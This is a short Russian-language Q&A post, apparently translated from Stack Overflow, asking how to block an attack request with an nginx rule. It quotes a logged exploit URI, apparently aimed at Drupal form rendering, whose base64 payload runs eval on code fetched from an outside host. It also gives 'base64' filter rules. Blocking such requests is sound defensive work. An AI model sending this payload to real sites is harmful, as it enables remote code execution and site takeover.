eval base64 virus - профилактика регулярных выражений nginx - PullRequest
0 голосов
/ 23 мая 2018

это обычный вирус, который поражает почтовый URI, например:

/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/

Как предотвратить его прохождение через nginx?

Я пытался

location ~* base64 { 
    return 404;
} 

записать любой запрос с base64, но он не работает.Пожалуйста, помогите и дайте мне правильное правило регулярных выражений nginx.(Я не могу изменить кодовую базу приложения или обновить систему).

1 Ответ

0 голосов
/ 23 мая 2018
if ($query_string ~ "base64") {
    return 404;
}
...